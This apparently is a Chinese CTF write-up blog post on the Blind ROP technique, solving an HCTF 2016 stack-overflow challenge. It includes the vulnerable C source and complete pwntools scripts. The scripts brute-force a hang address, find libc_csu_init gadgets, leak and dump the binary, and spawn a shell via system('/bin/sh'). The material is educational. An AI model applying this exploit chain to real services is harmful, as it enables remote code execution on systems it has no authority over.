<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>Have fun with Blind ROP | o0xmuhe&#39;s blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="0x00: 关于BROP第一次遇到BROP是在HCTF 2016，当时并没有搞定这个东西，前一段时间花了点时间研究了下这种利用方式，搞定了那个题目，顺便也看了下关于BROP的论文和slide，实践了下使用BROP技术搞低版本的ngnix。">
<meta name="keywords" content="ctf writeup,pwn,exploit">
<meta property="og:type" content="article">
<meta property="og:title" content="Have fun with Blind ROP">
<meta property="og:url" content="http://o0xmuhe.me/2017/01/22/Have-fun-with-Blind-ROP/index.html">
<meta property="og:site_name" content="o0xmuhe&#39;s blog">
<meta property="og:description" content="0x00: 关于BROP第一次遇到BROP是在HCTF 2016，当时并没有搞定这个东西，前一段时间花了点时间研究了下这种利用方式，搞定了那个题目，顺便也看了下关于BROP的论文和slide，实践了下使用BROP技术搞低版本的ngnix。">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2017-01-22T12:40:47.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Have fun with Blind ROP">
<meta name="twitter:description" content="0x00: 关于BROP第一次遇到BROP是在HCTF 2016，当时并没有搞定这个东西，前一段时间花了点时间研究了下这种利用方式，搞定了那个题目，顺便也看了下关于BROP的论文和slide，实践了下使用BROP技术搞低版本的ngnix。">
  
    <link rel="alternate" href="/atom.xml" title="o0xmuhe&#39;s blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    
  
  <link rel="stylesheet" href="/css/style.css">
  

</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    
    <div id="header-inner" class="inner">
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://o0xmuhe.me"></form>
      </div>
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">首页</a>
        
          <a class="main-nav-link" href="/archives">归档</a>
        
          <a class="main-nav-link" href="/about">关于</a>
        
          <a class="main-nav-link" href="/frinds">友链</a>
        
          <a class="main-nav-link" href="/Pwnable-Log">Pwnable</a>
        
      </nav>
      
    </div>
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">o0xmuhe&#39;s blog</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">寻找大师，追随大师，成为大师，超越大师</a>
        </h2>
      
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-Have-fun-with-Blind-ROP" class="article article-type-post" itemscope="" itemprop="blogPost">
  <div class="article-meta">
    <a href="/2017/01/22/Have-fun-with-Blind-ROP/" class="article-date">
  <time datetime="2017-01-22T07:30:08.000Z" itemprop="datePublished">2017-01-22</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Have fun with Blind ROP
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <!-- Table of Contents -->
        
        <h4 id="0x00-关于BROP"><a href="#0x00-关于BROP" class="headerlink" title="0x00: 关于BROP"></a>0x00: 关于BROP</h4><p>第一次遇到BROP是在HCTF 2016，当时并没有搞定这个东西，前一段时间花了点时间研究了下这种利用方式，搞定了那个题目，顺便也看了下关于BROP的论文和slide，实践了下使用BROP技术搞低版本的ngnix。<br><a id="more"></a></p>
<h4 id="0x01-先说CTF中遇到的"><a href="#0x01-先说CTF中遇到的" class="headerlink" title="0x01: 先说CTF中遇到的"></a>0x01: 先说CTF中遇到的</h4><p>比赛结束后，杭电的师傅们把题目都开源丢github了，所以我直接拿来源码自己编译自己搞了，源码如下<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="keyword">int</span> i;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">check</span><span class="params">()</span></span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span>&#123;</span><br><span class="line">    setbuf(<span class="built_in">stdin</span>,<span class="literal">NULL</span>);</span><br><span class="line">    setbuf(<span class="built_in">stdout</span>,<span class="literal">NULL</span>);</span><br><span class="line">    setbuf(<span class="built_in">stderr</span>,<span class="literal">NULL</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">for</span>(;;)&#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">"WelCome my friend,Do you know password?"</span>);</span><br><span class="line">        <span class="keyword">if</span>(!check())&#123;</span><br><span class="line">            <span class="built_in">puts</span>(<span class="string">"Do not dump my memory"</span>);</span><br><span class="line">        &#125;<span class="keyword">else</span> &#123;</span><br><span class="line">            </span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">"No password, no game"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">check</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> buf[<span class="number">50</span>];</span><br><span class="line">    read(STDIN_FILENO,buf,<span class="number">1024</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">strcmp</span>(buf,<span class="string">"aslvkm;asd;alsfm;aoeim;wnv;lasdnvdljasd;flk"</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>比赛的时候这个题目只给了ip和端口，其他信息就没有了，后面给出了bof的buffer大小作为提示。那么根据这个大小可以计算出payload的结构，所以就可以使用BROP的思路去一步一步搞定这个题目了。</p>
<h4 id="0x02：过程"><a href="#0x02：过程" class="headerlink" title="0x02：过程"></a>0x02：过程</h4><h6 id="1-找到hang-addr"><a href="#1-找到hang-addr" class="headerlink" title="1. 找到hang addr"></a>1. 找到hang addr</h6><p>首先要找到这样一个覆盖<code>ret addr</code>后不会引起服务崩溃的地址，我的做法是暴力跑，利用<code>pwntools</code>的异常处理来判断连接是否挂掉了。<br>就像这样简单粗暴的从<code>0x400000</code>去跑，然后<code>log</code>进文件，最后我只要去查看文件就知道<code>hang addr</code>是什么了。<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">log_in_file</span><span class="params">(addr)</span>:</span></span><br><span class="line">    <span class="comment">#f = open('log.txt','a')</span></span><br><span class="line">    <span class="comment">#f = open('gadgets.txt','a')</span></span><br><span class="line">    f = open(<span class="string">'res.txt'</span>,<span class="string">'a'</span>)</span><br><span class="line">    f.write(<span class="string">"ok addr : 0x%x\n"</span> % addr)</span><br><span class="line">    f.close()</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_hang_addr</span><span class="params">(addr)</span>:</span></span><br><span class="line">    p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">10001</span>)</span><br><span class="line">    payload = <span class="string">"A"</span> * <span class="number">72</span> + p64(addr)</span><br><span class="line">    p.recvuntil(<span class="string">'WelCome my friend,Do you know password?'</span>)</span><br><span class="line">    p.sendline(payload)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="comment">#for junk</span></span><br><span class="line">        p.recvline()</span><br><span class="line">        <span class="keyword">if</span>(p.recv() != <span class="keyword">None</span>):</span><br><span class="line">            log.info(<span class="string">"alive ! at 0x%x"</span> % addr)</span><br><span class="line">            log_in_file(addr)</span><br><span class="line">            p.close()</span><br><span class="line">    <span class="keyword">except</span> EOFError <span class="keyword">as</span> e: </span><br><span class="line">        p.close()</span><br><span class="line">        log.info(<span class="string">"dead connection! at 0x%x"</span> % addr)</span><br><span class="line"></span><br><span class="line"><span class="comment">#finally,I got hang_addr = 0x400724</span></span><br></pre></td></tr></table></figure></p>
<h6 id="2-找到gadgets"><a href="#2-找到gadgets" class="headerlink" title="2. 找到gadgets"></a>2. 找到gadgets</h6><p>有了<code>hang addr</code>，下一步就是寻找gadgets了，我这里是直接找通用型<code>gadgets</code>。<br>我放置的payload如下:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">"A"</span> * <span class="number">72</span> + p64(addr) + p64(<span class="number">1</span>)+p64(<span class="number">2</span>)+p64(<span class="number">3</span>)+p64(<span class="number">4</span>)+p64(<span class="number">5</span>)+p64(<span class="number">6</span>)+p64(hang_addr)</span><br></pre></td></tr></table></figure></p>
<p>如果说，程序不挂那就说明找到了这个gadgets 。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">pop    rbx</span><br><span class="line">pop    rbp</span><br><span class="line">pop    r12</span><br><span class="line">pop    r13</span><br><span class="line">pop    r14</span><br><span class="line">pop    r15</span><br><span class="line">ret</span><br></pre></td></tr></table></figure></p>
<p>代码如下：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_gadgets_addr</span><span class="params">(addr)</span>:</span></span><br><span class="line">    p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">10001</span>)</span><br><span class="line">    payload = <span class="string">"A"</span> * <span class="number">72</span> + p64(addr) + p64(<span class="number">1</span>)+p64(<span class="number">2</span>)+p64(<span class="number">3</span>)+p64(<span class="number">4</span>)+p64(<span class="number">5</span>)+p64(<span class="number">6</span>)+p64(hang_addr)</span><br><span class="line">    p.recvuntil(<span class="string">'WelCome my friend,Do you know password?'</span>)</span><br><span class="line">    p.sendline(payload)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="comment">#for junk</span></span><br><span class="line">        p.recvline()</span><br><span class="line">        <span class="keyword">if</span>(p.recv() != <span class="keyword">None</span>):</span><br><span class="line">            log.info(<span class="string">"find gadgets at 0x%x"</span> % addr)</span><br><span class="line">            log_in_file(addr)</span><br><span class="line">            p.close()</span><br><span class="line">    <span class="keyword">except</span> EOFError <span class="keyword">as</span> e: </span><br><span class="line">        p.close()</span><br><span class="line">        log.info(<span class="string">"dead connection! at 0x%x"</span> % addr)</span><br></pre></td></tr></table></figure></p>
<p>最后我得到的结果是：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">ppppppr_addr = <span class="number">0x4007ba</span></span><br><span class="line">gadget2 = ppppppr_addr - <span class="number">0x1a</span></span><br><span class="line">gadget1 = ppppppr_addr</span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">gadget1:</span></span><br><span class="line"><span class="string">    mov    rdx,r13</span></span><br><span class="line"><span class="string">    mov    rsi,r14</span></span><br><span class="line"><span class="string">    mov    edi,r15d</span></span><br><span class="line"><span class="string">    call   QWORD PTR [r12+rbx*8]</span></span><br><span class="line"><span class="string">    add    rbx,0x1</span></span><br><span class="line"><span class="string">    cmp    rbx,rbp</span></span><br><span class="line"><span class="string">    jne    4007a0 &lt;__libc_csu_init+0x40&gt;</span></span><br><span class="line"><span class="string">    add    rsp,0x8</span></span><br><span class="line"><span class="string">gadget2:</span></span><br><span class="line"><span class="string">    pop    rbx</span></span><br><span class="line"><span class="string">    pop    rbp</span></span><br><span class="line"><span class="string">    pop    r12</span></span><br><span class="line"><span class="string">    pop    r13</span></span><br><span class="line"><span class="string">    pop    r14</span></span><br><span class="line"><span class="string">    pop    r15</span></span><br><span class="line"><span class="string">    ret</span></span><br><span class="line"><span class="string">'''</span></span><br></pre></td></tr></table></figure></p>
<h6 id="3-构造leak去dump-bin-file"><a href="#3-构造leak去dump-bin-file" class="headerlink" title="3. 构造leak去dump bin file"></a>3. 构造leak去dump bin file</h6><p>通用型gadgets的构造我这里使用了Icemakr写好的一个函数<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#this func from Icemakr. thx.</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">com_gadget</span><span class="params">(part1, part2, jmp2, arg1 = <span class="number">0x0</span>, arg2 = <span class="number">0x0</span>, arg3 = <span class="number">0x0</span>)</span>:</span></span><br><span class="line">    payload  = p64(part1)   <span class="comment"># part1 entry pop_rbx_pop_rbp_pop_r12_pop_r13_pop_r14_pop_r15_ret</span></span><br><span class="line">    payload += p64(<span class="number">0x0</span>)     <span class="comment"># rbx be 0x0</span></span><br><span class="line">    payload += p64(<span class="number">0x1</span>)     <span class="comment"># rbp be 0x1</span></span><br><span class="line">    payload += p64(jmp2)    <span class="comment"># r12 jump to</span></span><br><span class="line">    payload += p64(arg3)    <span class="comment"># r13 -&gt; rdx    arg3</span></span><br><span class="line">    payload += p64(arg2)    <span class="comment"># r14 -&gt; rsi    arg2</span></span><br><span class="line">    payload += p64(arg1)    <span class="comment"># r15 -&gt; edi    arg1</span></span><br><span class="line">    payload += p64(part2)   <span class="comment"># part2 entry will call [rbx + r12 + 0x8]</span></span><br><span class="line">    payload += <span class="string">'A'</span> * <span class="number">56</span>     <span class="comment"># junk</span></span><br><span class="line">    <span class="keyword">return</span> payload</span><br></pre></td></tr></table></figure></p>
<p>后面直接构造leak函数<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leak</span><span class="params">(addr)</span>:</span></span><br><span class="line">    p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">10001</span>)</span><br><span class="line">    <span class="comment">#p = process('./main')</span></span><br><span class="line">    <span class="comment">#raw_input('#')</span></span><br><span class="line">    payload = <span class="string">"A"</span>*<span class="number">72</span> + com_gadget(gadget1,gadget2,puts_addr,arg1=addr)+p64(hang_addr)</span><br><span class="line">    p.recvuntil(<span class="string">'WelCome my friend,Do you know password?'</span>)</span><br><span class="line">    p.sendline(payload)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        p.recvline()</span><br><span class="line">        data = p.recvline().strip()</span><br><span class="line">        <span class="keyword">if</span>(data != <span class="keyword">None</span>):</span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                data = data[<span class="number">0</span>:data.index(<span class="string">"WelCome"</span>)]</span><br><span class="line">            <span class="keyword">except</span> ValueError <span class="keyword">as</span> e:</span><br><span class="line">                data = data</span><br><span class="line">            <span class="comment">#if leak data is 0x00</span></span><br><span class="line">            <span class="keyword">if</span> data == <span class="string">""</span>:</span><br><span class="line">                data = <span class="string">"\x00"</span></span><br><span class="line">            <span class="comment">#if leak data is end with 0x0a</span></span><br><span class="line">            <span class="keyword">elif</span>(data[len(data)- <span class="number">1</span>] == <span class="string">'\n'</span> <span class="keyword">and</span> data[len(data)- <span class="number">2</span>] == <span class="string">'\n'</span>):</span><br><span class="line">                data = data.strip()</span><br><span class="line">                data = data+<span class="string">"\x0a"</span></span><br><span class="line">            log.info(<span class="string">"leaking: 0x%x --&gt; %s"</span> % (addr,(data <span class="keyword">or</span> <span class="string">''</span>).encode(<span class="string">'hex'</span>)))</span><br><span class="line">            p.close()</span><br><span class="line">            <span class="keyword">return</span> data</span><br><span class="line">    <span class="keyword">except</span> EOFError <span class="keyword">as</span> e: </span><br><span class="line">        p.close()</span><br><span class="line">        log.info(<span class="string">"dead connection! at 0x%x"</span> % addr)</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">None</span></span><br></pre></td></tr></table></figure></p>
<p>其实只要分别从0x400000和0x600000开始dump就可以。</p>
<h6 id="4-getshell"><a href="#4-getshell" class="headerlink" title="4.getshell"></a>4.getshell</h6><p>有了dump之后就得到了got表的信息，下面就可以正常的做了，leak函数地址，查偏移，然后构造rop，然后getshell。<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">com_gadget</span><span class="params">(part1, part2, jmp2, arg1 = <span class="number">0x0</span>, arg2 = <span class="number">0x0</span>, arg3 = <span class="number">0x0</span>)</span>:</span></span><br><span class="line">    payload  = p64(part1)   <span class="comment"># part1 entry pop_rbx_pop_rbp_pop_r12_pop_r13_pop_r14_pop_r15_ret</span></span><br><span class="line">    payload += p64(<span class="number">0x0</span>)     <span class="comment"># rbx be 0x0</span></span><br><span class="line">    payload += p64(<span class="number">0x1</span>)     <span class="comment"># rbp be 0x1</span></span><br><span class="line">    payload += p64(jmp2)    <span class="comment"># r12 jump to</span></span><br><span class="line">    payload += p64(arg3)    <span class="comment"># r13 -&gt; rdx    arg3</span></span><br><span class="line">    payload += p64(arg2)    <span class="comment"># r14 -&gt; rsi    arg2</span></span><br><span class="line">    payload += p64(arg1)    <span class="comment"># r15 -&gt; edi    arg1</span></span><br><span class="line">    payload += p64(part2)   <span class="comment"># part2 entry will call [rbx + r12 + 0x8]</span></span><br><span class="line">    payload += <span class="string">'A'</span> * <span class="number">56</span>     <span class="comment"># junk</span></span><br><span class="line">    <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line">hang_addr = <span class="number">0x400724</span></span><br><span class="line">ppppppr_addr = <span class="number">0x4007ba</span></span><br><span class="line">gadget1 = ppppppr_addr</span><br><span class="line">gadget2 = ppppppr_addr - <span class="number">0x1a</span></span><br><span class="line"></span><br><span class="line">puts_got = <span class="number">0x601018</span></span><br><span class="line">pop_rdi = gadget1 + (<span class="number">0x400E72</span> - <span class="number">0x400E6A</span> + <span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">10001</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'A'</span> * <span class="number">72</span></span><br><span class="line">payload += com_gadget(gadget1,gadget2,puts_got,arg1=<span class="number">0</span>,arg2=puts_got)+p64(hang_addr)</span><br><span class="line">payload += p64(hang_addr)</span><br><span class="line">p.send(payload)</span><br><span class="line">content = p.recv()</span><br><span class="line">puts_addr = u64(content[:<span class="number">-1</span>] + <span class="string">'\x00\x00'</span>)</span><br><span class="line"></span><br><span class="line">offset_system = <span class="number">0x45390</span></span><br><span class="line">offset_str_bin_sh = <span class="number">0x18c177</span></span><br><span class="line">system_addr = puts_addr - (<span class="number">0x6f690</span> - offset_system)</span><br><span class="line">bin_sh_addr = puts_addr - (<span class="number">0x6f690</span> - offset_str_bin_sh)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'A'</span> * <span class="number">72</span></span><br><span class="line">payload += p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<h4 id="0x03-参考与引用"><a href="#0x03-参考与引用" class="headerlink" title="0x03: 参考与引用"></a>0x03: 参考与引用</h4><p><a href="http://www.scs.stanford.edu/brop/" target="_blank" rel="noopener">BROP</a><br><a href="https://github.com/Ic3makr/pwnable" target="_blank" rel="noopener">Icemakr师傅的git</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://o0xmuhe.me/2017/01/22/Have-fun-with-Blind-ROP/" data-id="cjpdllizp000d1o4ee8yw9gc8" class="article-share-link">分享</a>
      
        <a href="http://o0xmuhe.me/2017/01/22/Have-fun-with-Blind-ROP/#ds-thread" class="article-comment-link">留言</a>
      
      
        <a href="http://o0xmuhe.me/2017/01/22/Have-fun-with-Blind-ROP/#disqus_thread" class="article-comment-link">留言</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf-writeup/">ctf writeup</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/exploit/">exploit</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/">pwn</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2017/01/28/闲言碎语/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">上一篇</strong>
      <div class="article-nav-title">
        
          闲言碎语
        
      </div>
    </a>
  
  
    <a href="/2017/01/20/Windows-Kernel-Exploit-Study-2/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">下一篇</strong>
      <div class="article-nav-title">Windows Kernel Exploit Study(2)</div>
    </a>
  
</nav>

  
</article>

      <div class="duoshuo">
	<!-- 多说评论框 start -->
	<div class="ds-thread" data-thread-key="2017/01/22/Have-fun-with-Blind-ROP/" data-title="Have fun with Blind ROP" data-url="http://o0xmuhe.me/2017/01/22/Have-fun-with-Blind-ROP/"></div>
	<!-- 多说评论框 end -->
</div>


<section id="comments">
  <div id="disqus_thread">
    <noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
  </div>
</section>

</section>
           
    <aside id="sidebar">
  
    

  
    
    <div class="widget-wrap">
    
      <div class="widget" id="toc-widget-fixed">
      
        <strong class="toc-title">文章目录</strong>
        <div class="toc-widget-list">
              <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#0x00-关于BROP"><span class="toc-number">1.</span> <span class="toc-text">0x00: 关于BROP</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x01-先说CTF中遇到的"><span class="toc-number">2.</span> <span class="toc-text">0x01: 先说CTF中遇到的</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x02：过程"><span class="toc-number">3.</span> <span class="toc-text">0x02：过程</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#1-找到hang-addr"><span class="toc-number">3.0.1.</span> <span class="toc-text">1. 找到hang addr</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#2-找到gadgets"><span class="toc-number">3.0.2.</span> <span class="toc-text">2. 找到gadgets</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#3-构造leak去dump-bin-file"><span class="toc-number">3.0.3.</span> <span class="toc-text">3. 构造leak去dump bin file</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#4-getshell"><span class="toc-number">3.0.4.</span> <span class="toc-text">4.getshell</span></a></li></ol></li></ol><li class="toc-item toc-level-4"><a class="toc-link" href="#0x03-参考与引用"><span class="toc-number">4.</span> <span class="toc-text">0x03: 参考与引用</span></a></li>
          </div>
      </div>
    </div>

  
    

  
    
  
    
  
    


  
    

  
    

  
</aside>

      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-left">
      &copy; 2014 - 2018 muhe&nbsp;|&nbsp;
      主题 <a href="https://github.com/giscafer/hexo-theme-cafe/" target="_blank">Cafe</a>
    </div>
     <div id="footer-right">
      联系方式&nbsp;|&nbsp;o0xmuhe@gmail.com
    </div>
  </div>
</footer>
 <script src="/jquery/jquery.min.js"></script>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">首页</a>
  
    <a href="/archives" class="mobile-nav-link">归档</a>
  
    <a href="/about" class="mobile-nav-link">关于</a>
  
    <a href="/frinds" class="mobile-nav-link">友链</a>
  
    <a href="/Pwnable-Log" class="mobile-nav-link">Pwnable</a>
  
</nav>
    <img class="back-to-top-btn" src="/images/fly-to-top.png">
<script>
// Elevator script included on the page, already.
window.onload = function() {
  var elevator = new Elevator({
    selector:'.back-to-top-btn',
    element: document.querySelector('.back-to-top-btn'),
    duration: 1000 // milliseconds
  });
}
</script>
    
<script>
  var disqus_shortname = 'o0xmuhe';
  
  var disqus_url = 'http://o0xmuhe.me/2017/01/22/Have-fun-with-Blind-ROP/';
  
  (function(){
    var dsq = document.createElement('script');
    dsq.type = 'text/javascript';
    dsq.async = true;
    dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
    (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
  })();
</script>



    	<script type="text/javascript">
        var duoshuoQuery = {short_name:"o0xmuhe"};
      </script>
      <script src="/duoshuo/embed.js"></script>


 <script src="/js/is.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>
<script src="/js/elevator.js"></script>
  </div>
</body>
</html>